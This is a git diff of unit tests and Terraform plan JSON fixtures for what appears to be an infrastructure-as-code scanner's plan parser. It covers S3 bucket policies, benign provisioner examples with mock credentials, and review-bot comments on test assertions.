"var.analytics_source_bucket_arn" + ] + }, + "variable": { + "constant_value": "aws:SourceArn" + } + }, + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "references": [ + "var.inventory_self_source_destination", + "data.aws_caller_identity.current.id", + "data.aws_caller_identity.current", + "var.inventory_source_account_id", + "var.analytics_self_source_destination", + "data.aws_caller_identity.current.id", + "data.aws_caller_identity.current", + "var.analytics_source_account_id" + ] + }, + "variable": { + "constant_value": "aws:SourceAccount" + } + }, + { + "test": { 
+ "constant_value": "StringEquals" + }, + "values": { + "constant_value": [ + "bucket-owner-full-control" + ] + }, + "variable": { + "constant_value": "s3:x-amz-acl" + } + } + ], + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "s3.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "destinationInventoryAndAnalyticsPolicy" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_inventory_destination_policy", + "var.attach_analytics_destination_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.lb_log_delivery", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "lb_log_delivery", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "constant_value": [ + "bucket-owner-full-control" + ] + }, + "variable": { + "constant_value": "s3:x-amz-acl" + } + } + ], + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "delivery.logs.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSLogDeliveryWrite" + } + }, + { + "actions": { + "constant_value": [ + "s3:GetBucketAcl", + "s3:ListBucket" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "delivery.logs.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + 
"references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSLogDeliveryAclCheck" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_lb_log_delivery_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.require_latest_tls", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "require_latest_tls", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:*" + ] + }, + "condition": [ + { + "test": { + "constant_value": "NumericLessThan" + }, + "values": { + "constant_value": [ + "1.2" + ] + }, + "variable": { + "constant_value": "s3:TlsVersion" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyOutdatedTLS" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_require_latest_tls_policy" + ] + } + }, + { + "address": "data.aws_partition.current", + "mode": "data", + "type": "aws_partition", + "name": "current", + "provider_config_key": "s3-bucket:aws", + "schema_version": 0 + }, + { + "address": "data.aws_region.current", + "mode": "data", + "type": "aws_region", + "name": "current", + "provider_config_key": "s3-bucket:aws", + "schema_version": 0 + } + ], + "variables": { + "acceleration_status": { + "default": null, + "description": "(Optional) Sets the accelerate configuration of an existing bucket. Can be Enabled or Suspended." 
+ }, + "access_log_delivery_policy_source_accounts": { + "default": [], + "description": "(Optional) List of AWS Account IDs should be allowed to deliver access logs to this bucket." + }, + "access_log_delivery_policy_source_buckets": { + "default": [], + "description": "(Optional) List of S3 bucket ARNs wich should be allowed to deliver access logs to this bucket." + }, + "acl": { + "default": null, + "description": "(Optional) The canned ACL to apply. Conflicts with `grant`" + }, + "allowed_kms_key_arn": { + "default": null, + "description": "The ARN of KMS key which should be allowed in PutObject" + }, + "analytics_configuration": { + "default": {}, + "description": "Map containing bucket analytics configuration." + }, + "analytics_self_source_destination": { + "default": false, + "description": "Whether or not the analytics source bucket is also the destination bucket." + }, + "analytics_source_account_id": { + "default": null, + "description": "The analytics source account id." + }, + "analytics_source_bucket_arn": { + "default": null, + "description": "The analytics source bucket ARN." + }, + "attach_access_log_delivery_policy": { + "default": false, + "description": "Controls if S3 bucket should have S3 access log delivery policy attached" + }, + "attach_analytics_destination_policy": { + "default": false, + "description": "Controls if S3 bucket should have bucket analytics destination policy attached." + }, + "attach_deny_incorrect_encryption_headers": { + "default": false, + "description": "Controls if S3 bucket should deny incorrect encryption headers policy attached." + }, + "attach_deny_incorrect_kms_key_sse": { + "default": false, + "description": "Controls if S3 bucket policy should deny usage of incorrect KMS key SSE." 
+ }, + "attach_deny_insecure_transport_policy": { + "default": false, + "description": "Controls if S3 bucket should have deny non-SSL transport policy attached" + }, + "attach_deny_unencrypted_object_uploads": { + "default": false, + "description": "Controls if S3 bucket should deny unencrypted object uploads policy attached." + }, + "attach_elb_log_delivery_policy": { + "default": false, + "description": "Controls if S3 bucket should have ELB log delivery policy attached" + }, + "attach_inventory_destination_policy": { + "default": false, + "description": "Controls if S3 bucket should have bucket inventory destination policy attached." + }, + "attach_lb_log_delivery_policy": { + "default": false, + "description": "Controls if S3 bucket should have ALB/NLB log delivery policy attached" + }, + "attach_policy": { + "default": false, + "description": "Controls if S3 bucket should have bucket policy attached (set to `true` to use value of `policy` as bucket policy)" + }, + "attach_public_policy": { + "default": true, + "description": "Controls if a user defined public bucket policy will be attached (set to `false` to allow upstream to apply defaults to the bucket)" + }, + "attach_require_latest_tls_policy": { + "default": false, + "description": "Controls if S3 bucket should require the latest version of TLS" + }, + "block_public_acls": { + "default": true, + "description": "Whether Amazon S3 should block public ACLs for this bucket." + }, + "block_public_policy": { + "default": true, + "description": "Whether Amazon S3 should block public bucket policies for this bucket." + }, + "bucket": { + "default": null, + "description": "(Optional, Forces new resource) The name of the bucket. If omitted, Terraform will assign a random, unique name." + }, + "bucket_prefix": { + "default": null, + "description": "(Optional, Forces new resource) Creates a unique bucket name beginning with the specified prefix. Conflicts with bucket." 
+ }, + "control_object_ownership": { + "default": false, + "description": "Whether to manage S3 Bucket Ownership Controls on this bucket." + }, + "cors_rule": { + "default": [], + "description": "List of maps containing rules for Cross-Origin Resource Sharing." + }, + "create_bucket": { + "default": true, + "description": "Controls if S3 bucket should be created" + }, + "expected_bucket_owner": { + "default": null, + "description": "The account ID of the expected bucket owner" + }, + "force_destroy": { + "default": false, + "description": "(Optional, Default:false ) A boolean that indicates all objects should be deleted from the bucket so that the bucket can be destroyed without error. These objects are not recoverable." + }, + "grant": { + "default": [], + "description": "An ACL policy grant. Conflicts with `acl`" + }, + "ignore_public_acls": { + "default": true, + "description": "Whether Amazon S3 should ignore public ACLs for this bucket." + }, + "intelligent_tiering": { + "default": {}, + "description": "Map containing intelligent tiering configuration." + }, + "inventory_configuration": { + "default": {}, + "description": "Map containing S3 inventory configuration." + }, + "inventory_self_source_destination": { + "default": false, + "description": "Whether or not the inventory source bucket is also the destination bucket." + }, + "inventory_source_account_id": { + "default": null, + "description": "The inventory source account id." + }, + "inventory_source_bucket_arn": { + "default": null, + "description": "The inventory source bucket ARN." + }, + "lifecycle_rule": { + "default": [], + "description": "List of maps containing configuration of object lifecycle management." + }, + "logging": { + "default": {}, + "description": "Map containing access bucket logging configuration." + }, + "metric_configuration": { + "default": [], + "description": "Map containing bucket metric configuration." 
+ }, + "object_lock_configuration": { + "default": {}, + "description": "Map containing S3 object locking configuration." + }, + "object_lock_enabled": { + "default": false, + "description": "Whether S3 bucket should have an Object Lock configuration enabled." + }, + "object_ownership": { + "default": "BucketOwnerEnforced", + "description": "Object ownership. Valid values: BucketOwnerEnforced, BucketOwnerPreferred or ObjectWriter. 'BucketOwnerEnforced': ACLs are disabled, and the bucket owner automatically owns and has full control over every object in the bucket. 'BucketOwnerPreferred': Objects uploaded to the bucket change ownership to the bucket owner if the objects are uploaded with the bucket-owner-full-control canned ACL. 'ObjectWriter': The uploading account will own the object if the object is uploaded with the bucket-owner-full-control canned ACL." + }, + "owner": { + "default": {}, + "description": "Bucket owner's display name and ID. Conflicts with `acl`" + }, + "policy": { + "default": null, + "description": "(Optional) A valid bucket policy JSON document. Note that if the policy document is not specific enough (but still valid), Terraform may view the policy as constantly changing in a terraform plan. In this case, please make sure you use the verbose/specific version of the policy. For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide." + }, + "replication_configuration": { + "default": {}, + "description": "Map containing cross-region replication configuration." + }, + "request_payer": { + "default": null, + "description": "(Optional) Specifies who should bear the cost of Amazon S3 data transfer. Can be either BucketOwner or Requester. By default, the owner of the S3 bucket would incur the costs of any data transfer. See Requester Pays Buckets developer guide for more information." 
+ }, + "restrict_public_buckets": { + "default": true, + "description": "Whether Amazon S3 should restrict public bucket policies for this bucket." + }, + "server_side_encryption_configuration": { + "default": {}, + "description": "Map containing server-side encryption configuration." + }, + "tags": { + "default": {}, + "description": "(Optional) A mapping of tags to assign to the bucket." + }, + "versioning": { + "default": {}, + "description": "Map containing versioning configuration." + }, + "website": { + "default": {}, + "description": "Map containing static web-site hosting or redirect configuration." + } + } + }, + "version_constraint": "4.0.1" + } + } + } + } +} \ No newline at end of file diff --git a/tests/terraform/parser/resources/plan_provisioners/tfplan.json b/tests/terraform/parser/resources/plan_provisioners/tfplan.json index fe31076b164..f4b205440c3 100644 --- a/tests/terraform/parser/resources/plan_provisioners/tfplan.json +++ b/tests/terraform/parser/resources/plan_provisioners/tfplan.json 
@@ -5,82 +5,61 @@ "root_module": { "resources": [ { - "address": "aws_db_instance.default", + "address": "aws_instance.web", "mode": "managed", - "type": "aws_db_instance", - "name": "default", + "type": "aws_instance", + "name": "web", "provider_name": "registry.terraform.io/hashicorp/aws", - "schema_version": 2, + "schema_version": 1, "values": { - "allocated_storage": 10, - "allow_major_version_upgrade": null, - "apply_immediately": false, - "auto_minor_version_upgrade": true, - "blue_green_update": [], - "copy_tags_to_snapshot": false, - "custom_iam_instance_profile": null, - "customer_owned_ip_enabled": null, - "db_name": "mydb", - "delete_automated_backups": true, - "deletion_protection": null, - "domain": null, - "domain_iam_role_name": null, - "enabled_cloudwatch_logs_exports": null, - "engine": "mysql", - "engine_version": "5.7", - "final_snapshot_identifier": null, - "iam_database_authentication_enabled": null, - "instance_class": "db.t3.micro", - "manage_master_user_password": null, - "max_allocated_storage": null, - "monitoring_interval": 0, - "parameter_group_name": "default.mysql5.7", - "password": "foobarbaz", - "performance_insights_enabled": false, - "publicly_accessible": false, - "replicate_source_db": null, - "restore_to_point_in_time": [], - "s3_import": [], - "skip_final_snapshot": true, - "storage_encrypted": null, - "tags": null, + "ami": "ami-09a5b0b7edf08843d", + "credit_specification": [], + "get_password_data": false, + "hibernation": null, + "instance_type": "t3.micro", + "launch_template": [], + "source_dest_check": true, + "tags": { + "Name": "HelloWorld" + }, + "tags_all": { + "Name": "HelloWorld" + }, "timeouts": null, - "username": "foo" + "user_data_replace_on_change": false, + "volume_tags": null }, "sensitive_values": { - "blue_green_update": [], - "listener_endpoint": [], - "master_user_secret": [], - "replicas": [], - "restore_to_point_in_time": [], - "s3_import": [], + "capacity_reservation_specification": [], + 
"cpu_options": [], + "credit_specification": [], + "ebs_block_device": [], + "enclave_options": [], + "ephemeral_block_device": [], + "instance_market_options": [], + "ipv6_addresses": [], + "launch_template": [], + "maintenance_options": [], + "metadata_options": [], + "network_interface": [], + "private_dns_name_options": [], + "root_block_device": [], + "secondary_private_ips": [], + "security_groups": [], + "tags": {}, "tags_all": {}, "vpc_security_group_ids": [] } - }, - { - "address": "terraform_data.bad2", - "mode": "managed", - "type": "terraform_data", - "name": "bad2", - "provider_name": "terraform.io/builtin/terraform", - "schema_version": 0, - "values": { - "input": null, - "output": null, - "triggers_replace": null - }, - "sensitive_values": {} } ] } }, "resource_changes": [ { - "address": "aws_db_instance.default", + "address": "aws_instance.web", "mode": "managed", - "type": "aws_db_instance", - "name": "default", + "type": "aws_instance", + "name": "web", "provider_name": "registry.terraform.io/hashicorp/aws", "change": { "actions": [ 
@@ -88,123 +67,99 @@ ], "before": null, "after": { - "allocated_storage": 10, - "allow_major_version_upgrade": null, - "apply_immediately": false, - "auto_minor_version_upgrade": true, - "blue_green_update": [], - "copy_tags_to_snapshot": false, - "custom_iam_instance_profile": null, - "customer_owned_ip_enabled": null, - "db_name": "mydb", - "delete_automated_backups": true, - "deletion_protection": null, - "domain": null, - "domain_iam_role_name": null, - "enabled_cloudwatch_logs_exports": null, - "engine": "mysql", - "engine_version": "5.7", - "final_snapshot_identifier": null, - "iam_database_authentication_enabled": null, - "instance_class": "db.t3.micro", - "manage_master_user_password": null, - "max_allocated_storage": null, - "monitoring_interval": 0, - "parameter_group_name": "default.mysql5.7", - "password": "foobarbaz", - "performance_insights_enabled": false, - "publicly_accessible": false, - "replicate_source_db": null, - "restore_to_point_in_time": [], - "s3_import": [], - "skip_final_snapshot": true, - "storage_encrypted": null, - "tags": null, + "ami": "ami-09a5b0b7edf08843d", + "credit_specification": [], + "get_password_data": false, + "hibernation": null, + "instance_type": "t3.micro", + "launch_template": [], + "source_dest_check": true, + "tags": { + "Name": "HelloWorld" + }, + "tags_all": { + "Name": "HelloWorld" + }, "timeouts": null, - "username": "foo" + "user_data_replace_on_change": false, + "volume_tags": null }, "after_unknown": { - "address": true, "arn": true, + "associate_public_ip_address": true, "availability_zone": true, - "backup_retention_period": true, - "backup_target": true, - "backup_window": true, - "blue_green_update": [], - "ca_cert_identifier": true, - "character_set_name": true, - "db_subnet_group_name": true, - "endpoint": true, - "engine_version_actual": true, - "hosted_zone_id": true, + "capacity_reservation_specification": true, + "cpu_core_count": true, + "cpu_options": true, + "cpu_threads_per_core": true, + 
"credit_specification": [], + "disable_api_stop": true, + "disable_api_termination": true, + "ebs_block_device": true, + "ebs_optimized": true, + "enclave_options": true, + "ephemeral_block_device": true, + "host_id": true, + "host_resource_group_arn": true, + "iam_instance_profile": true, "id": true, - "identifier": true, - "identifier_prefix": true, - "iops": true, - "kms_key_id": true, - "latest_restorable_time": true, - "license_model": true, - "listener_endpoint": true, - "maintenance_window": true, - "master_user_secret": true, - "master_user_secret_kms_key_id": true, - "monitoring_role_arn": true, - "multi_az": true, - "nchar_character_set_name": true, - "network_type": true, - "option_group_name": true, - "performance_insights_kms_key_id": true, - "performance_insights_retention_period": true, - "port": true, - "replica_mode": true, - "replicas": true, - "resource_id": true, - "restore_to_point_in_time": [], - "s3_import": [], - "snapshot_identifier": true, - "status": true, - "storage_throughput": true, - "storage_type": true, - "tags_all": true, - "timezone": true, + "instance_initiated_shutdown_behavior": true, + "instance_lifecycle": true, + "instance_market_options": true, + "instance_state": true, + "ipv6_address_count": true, + "ipv6_addresses": true, + "key_name": true, + "launch_template": [], + "maintenance_options": true, + "metadata_options": true, + "monitoring": true, + "network_interface": true, + "outpost_arn": true, + "password_data": true, + "placement_group": true, + "placement_partition_number": true, + "primary_network_interface_id": true, + "private_dns": true, + "private_dns_name_options": true, + "private_ip": true, + "public_dns": true, + "public_ip": true, + "root_block_device": true, + "secondary_private_ips": true, + "security_groups": true, + "spot_instance_request_id": true, + "subnet_id": true, + "tags": {}, + "tags_all": {}, + "tenancy": true, + "user_data": true, + "user_data_base64": true, "vpc_security_group_ids": true }, 
"before_sensitive": false, "after_sensitive": { - "blue_green_update": [], - "listener_endpoint": [], - "master_user_secret": [], - "password": true, - "replicas": [], - "restore_to_point_in_time": [], - "s3_import": [], + "capacity_reservation_specification": [], + "cpu_options": [], + "credit_specification": [], + "ebs_block_device": [], + "enclave_options": [], + "ephemeral_block_device": [], + "instance_market_options": [], + "ipv6_addresses": [], + "launch_template": [], + "maintenance_options": [], + "metadata_options": [], + "network_interface": [], + "private_dns_name_options": [], + "root_block_device": [], + "secondary_private_ips": [], + "security_groups": [], + "tags": {}, "tags_all": {}, "vpc_security_group_ids": [] } } - }, - { - "address": "terraform_data.bad2", - "mode": "managed", - "type": "terraform_data", - "name": "bad2", - "provider_name": "terraform.io/builtin/terraform", - "change": { - "actions": [ - "create" - ], - "before": null, - "after": { - "input": null, - "output": null, - "triggers_replace": null - }, - "after_unknown": { - "id": true - }, - "before_sensitive": false, - "after_sensitive": {} - } } ], "configuration": { @@ -212,13 +167,12 @@ "aws": { "name": "aws", "full_name": "registry.terraform.io/hashicorp/aws", - "version_constraint": "~> 5.0", "expressions": { "access_key": { "constant_value": "mock_access_key" }, "region": { - "constant_value": "us-east-1" + "constant_value": "us-west-1" }, "secret_key": { "constant_value": "mock_secret_key" 
@@ -233,65 +187,27 @@ "constant_value": true } } - }, - "terraform": { - "name": "terraform", - "full_name": "terraform.io/builtin/terraform" } }, "root_module": { "resources": [ { - "address": "aws_db_instance.default", - "mode": "managed", - "type": "aws_db_instance", - "name": "default", - "provider_config_key": "aws", - "expressions": { - "allocated_storage": { - "constant_value": 10 - }, - "db_name": { - "constant_value": "mydb" - }, - "engine": { - "constant_value": "mysql" - }, - "engine_version": { - "constant_value": "5.7" - }, - "instance_class": { - "constant_value": "db.t3.micro" - }, - "parameter_group_name": { - "constant_value": "default.mysql5.7" - }, - "password": { - "constant_value": "foobarbaz" - }, - "skip_final_snapshot": { - "constant_value": true - }, - "username": { - "constant_value": "foo" - } - }, - "schema_version": 2 - }, - { - "address": "aws_instance.bad", + "address": "aws_instance.web", "mode": "managed", "type": "aws_instance", - "name": "bad", + "name": "web", "provider_config_key": "aws", "provisioners": [ { "type": "local-exec", "expressions": { "command": { - "references": [ - "self.private_ip", - "self" + "constant_value": "open WFH, '>completed.txt' and print WFH scalar localtime" + }, + "interpreter": { + "constant_value": [ + "perl", + "-e" ] } } @@ -299,29 +215,7 @@ ], "expressions": { "ami": { - "references": [ - "data.aws_ami.ubuntu.id", - "data.aws_ami.ubuntu" - ] - }, - "instance_type": { - "constant_value": "t3.micro" - } - }, - "schema_version": 1 - }, - { - "address": "aws_instance.web", - "mode": "managed", - "type": "aws_instance", - "name": "web", - "provider_config_key": "aws", - "expressions": { - "ami": { - "references": [ - "data.aws_ami.ubuntu.id", - "data.aws_ami.ubuntu" - ] + "constant_value": "ami-09a5b0b7edf08843d" }, "instance_type": { "constant_value": "t3.micro" 
@@ -333,73 +227,9 @@ } }, "schema_version": 1 - }, - { - "address": "terraform_data.bad2", - "mode": "managed", - "type": "terraform_data", - "name": "bad2", - "provider_config_key": "terraform", - "provisioners": [ - { - "type": "local-exec", - "expressions": { - "command": { - "constant_value": "open WFH, '>completed.txt' and print WFH scalar localtime" - }, - "interpreter": { - "constant_value": [ - "perl", - "-e" - ] - } - } - } - ], - "schema_version": 0 - }, - { - "address": "data.aws_ami.ubuntu", - "mode": "data", - "type": "aws_ami", - "name": "ubuntu", - "provider_config_key": "aws", - "expressions": { - "filter": [ - { - "name": { - "constant_value": "name" - }, - "values": { - "constant_value": [ - "ubuntu/images/hvm-ssd/ubuntu-focal-20.04-amd64-server-*" - ] - } - }, - { - "name": { - "constant_value": "virtualization-type" - }, - "values": { - "constant_value": [ - "hvm" - ] - } - } - ], - "most_recent": { - "constant_value": true - }, - "owners": { - "constant_value": [ - "099720109477" - ] - } - }, - "schema_version": 0 } ] } }, - "timestamp": "2023-09-30T04:54:35Z" + "timestamp": "2024-07-26T05:47:45Z" } diff --git a/tests/terraform/parser/resources/plan_provisioners/tfplan2.json b/tests/terraform/parser/resources/plan_provisioners/tfplan2.json new file mode 100644 index 00000000000..18696d38e50 --- /dev/null +++ b/tests/terraform/parser/resources/plan_provisioners/tfplan2.json 
@@ -0,0 +1,243 @@ +{ + "format_version": "1.2", + "terraform_version": "1.5.7", + "planned_values": { + "root_module": { + "resources": [ + { + "address": "aws_instance.web", + "mode": "managed", + "type": "aws_instance", + "name": "web", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 1, + "values": { + "ami": "ami-09a5b0b7edf08843d", + "credit_specification": [], + "get_password_data": false, + "hibernation": null, + "instance_type": "t3.micro", + "launch_template": [], + "source_dest_check": true, + "tags": { + "Name": "HelloWorld" + }, + "tags_all": { + "Name": "HelloWorld" + }, + "timeouts": null, + "user_data_replace_on_change": false, + "volume_tags": null + }, + "sensitive_values": { + "capacity_reservation_specification": [], + "cpu_options": [], + "credit_specification": [], + "ebs_block_device": [], + "enclave_options": [], + "ephemeral_block_device": [], + "instance_market_options": [], + "ipv6_addresses": [], + "launch_template": [], + "maintenance_options": [], + "metadata_options": [], + "network_interface": [], + "private_dns_name_options": [], + "root_block_device": [], + "secondary_private_ips": [], + "security_groups": [], + "tags": {}, + "tags_all": {}, + "vpc_security_group_ids": [] + } + } + ] + } + }, + "resource_changes": [ + { + "address": "aws_instance.web", + "mode": "managed", + "type": "aws_instance", + "name": "web", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "ami": "ami-09a5b0b7edf08843d", + "credit_specification": [], + "get_password_data": false, + "hibernation": null, + "instance_type": "t3.micro", + "launch_template": [], + "source_dest_check": true, + "tags": { + "Name": "HelloWorld" + }, + "tags_all": { + "Name": "HelloWorld" + }, + "timeouts": null, + "user_data_replace_on_change": false, + "volume_tags": null + }, + "after_unknown": { + "arn": true, + "associate_public_ip_address": true, + 
"availability_zone": true, + "capacity_reservation_specification": true, + "cpu_core_count": true, + "cpu_options": true, + "cpu_threads_per_core": true, + "credit_specification": [], + "disable_api_stop": true, + "disable_api_termination": true, + "ebs_block_device": true, + "ebs_optimized": true, + "enclave_options": true, + "ephemeral_block_device": true, + "host_id": true, + "host_resource_group_arn": true, + "iam_instance_profile": true, + "id": true, + "instance_initiated_shutdown_behavior": true, + "instance_lifecycle": true, + "instance_market_options": true, + "instance_state": true, + "ipv6_address_count": true, + "ipv6_addresses": true, + "key_name": true, + "launch_template": [], + "maintenance_options": true, + "metadata_options": true, + "monitoring": true, + "network_interface": true, + "outpost_arn": true, + "password_data": true, + "placement_group": true, + "placement_partition_number": true, + "primary_network_interface_id": true, + "private_dns": true, + "private_dns_name_options": true, + "private_ip": true, + "public_dns": true, + "public_ip": true, + "root_block_device": true, + "secondary_private_ips": true, + "security_groups": true, + "spot_instance_request_id": true, + "subnet_id": true, + "tags": {}, + "tags_all": {}, + "tenancy": true, + "user_data": true, + "user_data_base64": true, + "vpc_security_group_ids": true + }, + "before_sensitive": false, + "after_sensitive": { + "capacity_reservation_specification": [], + "cpu_options": [], + "credit_specification": [], + "ebs_block_device": [], + "enclave_options": [], + "ephemeral_block_device": [], + "instance_market_options": [], + "ipv6_addresses": [], + "launch_template": [], + "maintenance_options": [], + "metadata_options": [], + "network_interface": [], + "private_dns_name_options": [], + "root_block_device": [], + "secondary_private_ips": [], + "security_groups": [], + "tags": {}, + "tags_all": {}, + "vpc_security_group_ids": [] + } + } + } + ], + "configuration": { + 
"provider_config": { + "aws": { + "name": "aws", + "full_name": "registry.terraform.io/hashicorp/aws", + "expressions": { + "access_key": { + "constant_value": "mock_access_key" + }, + "region": { + "constant_value": "us-west-1" + }, + "secret_key": { + "constant_value": "mock_secret_key" + }, + "skip_credentials_validation": { + "constant_value": true + }, + "skip_metadata_api_check": { + "constant_value": true + }, + "skip_requesting_account_id": { + "constant_value": true + } + } + } + }, + "root_module": { + "resources": [ + { + "address": "aws_instance.web", + "mode": "managed", + "type": "aws_instance", + "name": "web", + "provider_config_key": "aws", + "provisioners": [ + { + "type": "file", + "expressions": { + "destination": { + "constant_value": "/tmp/script.sh" + }, + "source": { + "constant_value": "script.sh" + } + } + }, + { + "type": "remote-exec", + "expressions": { + "inline": { + "constant_value": [ + "chmod +x /tmp/script.sh", + "/tmp/script.sh args" + ] + } + } + } + ], + "expressions": { + "ami": { + "constant_value": "ami-09a5b0b7edf08843d" + }, + "instance_type": { + "constant_value": "t3.micro" + }, + "tags": { + "constant_value": { + "Name": "HelloWorld" + } + } + }, + "schema_version": 1 + } + ] + } + }, + "timestamp": "2024-07-26T05:10:57Z" +} diff --git a/tests/terraform/parser/test_plan_parser.py b/tests/terraform/parser/test_plan_parser.py index f0e355aabf4..bead3b186b3 100644 --- a/tests/terraform/parser/test_plan_parser.py +++ b/tests/terraform/parser/test_plan_parser.py 
@@ -21,6 +21,14 @@ def test_tags_values_are_flattened(self):
if tag_key not in ['__startline__', '__endline__', 'start_line', 'end_line']:
self.assertIsInstance(tag_value, StrNode)
+ def test_provider_is_included(self):
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+ valid_plan_path = current_dir + "/resources/plan_tags/tfplan.json"
+ tf_definition, _ = parse_tf_plan(valid_plan_path, {})
+ file_provider_definition = tf_definition['provider']
+ self.assertTrue(file_provider_definition) # assert a provider exists
+ assert file_provider_definition[0].get('aws',{}).get('region', None) == 'us-west-2'
+
def test_more_tags_values_are_flattened(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan_tags_variety/tfplan.json"
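Review bot: test_provider_is_included mixes `self.assertTrue` with a bare `assert` on its last line; inside this unittest-style class, `self.assertEqual(file_provider_definition[0].get('aws', {}).get('region'), 'us-west-2')` would report the actual region on failure instead of a bare AssertionError. The `.get('aws', {})` default also turns a missing provider block into a vague mismatch rather than pointing at the absent key, so plain `['aws']['region']` indexing would fail closer to the cause. The plan_tags/tfplan.json fixture this reads is not part of the diff, so the expected `us-west-2` cannot be confirmed from here.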
@@ -53,13 +61,24 @@ def test_encodings(self):
def test_provisioners(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
- valid_plan_path = current_dir + "/resources/plan_provisioners/tfplan.json"
+ plan_files = ['tfplan.json','tfplan2.json']
+
+ for file in plan_files:
+ valid_plan_path = current_dir + "/resources/plan_provisioners/" + file
+ tf_definition, _ = parse_tf_plan(valid_plan_path, {})
+ file_resource_definition = tf_definition['resource'][0]
+ resource_definition = next(iter(file_resource_definition.values()))
+ resource_attributes = next(iter(resource_definition.values()))
+ self.assertTrue(resource_attributes['provisioner'])
+
+ def test_module_with_connected_resources(self):
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+ valid_plan_path = current_dir + "/resources/plan_module_with_connected_resources/tfplan.json"
tf_definition, _ = parse_tf_plan(valid_plan_path, {})
file_resource_definition = tf_definition['resource'][1]
resource_definition = next(iter(file_resource_definition.values()))
resource_attributes = next(iter(resource_definition.values()))
- self.assertTrue(resource_attributes['provisioner'])
-
+ self.assertTrue(resource_attributes['references_'])
def test_large_file(mocker: MockerFixture):
# given
diff --git a/tests/terraform/runner/resources/for_each/main.tf b/tests/terraform/runner/resources/for_each/main.tf
new file mode 100644
index 00000000000..5c0012bd272
--- /dev/null
+++ b/tests/terraform/runner/resources/for_each/main.tf
@@ -0,0 +1,5 @@
+
+module "simple" {
+ source = "./simple"
+ count = 2
+}
\ No newline at end of file
diff --git a/tests/terraform/runner/resources/for_each/simple/main.tf b/tests/terraform/runner/resources/for_each/simple/main.tf
new file mode 100644
index 00000000000..96e26cd7f73
--- /dev/null
+++ b/tests/terraform/runner/resources/for_each/simple/main.tf
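Review bot: The loop in test_provisioners gives no indication of which plan file failed when the assertion trips, and the loop variable `file` shadows a builtin; wrapping the body in `with self.subTest(plan_file=plan_file):` keeps both fixtures checked independently and names the failing one. The resource index moved from `[1]` to `[0]`, which matches the removal of terraform_data.bad2 from tfplan.json earlier in this diff, so tfplan2.json is presumably expected to carry a single resource as well. test_module_with_connected_resources reads `tf_definition['resource'][1]` from a plan_module_with_connected_resources fixture that is not in this diff, so that index cannot be checked here.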
@@ -0,0 +1,5 @@
+resource "aws_s3_bucket_object" "this_file" {
+ bucket = "your_bucket_name"
+ key = "readme.md"
+ source = "readme.md"
+}
diff --git a/tests/terraform/runner/resources/list_of_routes/list_of_routes.tf b/tests/terraform/runner/resources/list_of_routes/list_of_routes.tf
new file mode 100644
index 00000000000..bec66467c16
--- /dev/null
+++ b/tests/terraform/runner/resources/list_of_routes/list_of_routes.tf
@@ -0,0 +1,14 @@
+resource "aws_route_table" "private_route_table" {
+ vpc_id = aws_vpc.vpc.id
+
+ route {
+ cidr_block = "10.0.0.0/32"
+ vpc_peering_connection_id = var.vpc_peering_connection_id1
+ }
+
+ route {
+ cidr_block = "0.0.0.0/0"
+ vpc_peering_connection_id = var.vpc_peering_connection_id2
+ }
+
+}
\ No newline at end of file
diff --git a/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_fail.json b/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_fail.json
new file mode 100644
index 00000000000..f0551c12b36
--- /dev/null
+++ b/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_fail.json
